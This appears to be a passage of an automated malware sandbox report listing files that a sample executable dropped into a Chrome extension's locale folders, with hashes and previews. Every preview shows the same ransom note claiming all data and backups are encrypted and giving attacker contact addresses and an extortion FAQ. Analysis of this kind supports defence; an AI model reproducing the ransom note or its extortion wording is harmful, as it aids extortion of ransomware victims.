                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\en_US\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\es\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\et\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fil\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\fr\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\he\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\hi\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\hu\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\id\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\it\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ja\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ko\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\lt\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\lv\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ms\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\nl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\no\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pl\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pt_BR\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\pt_PT\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.10_0\_locales\ro\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
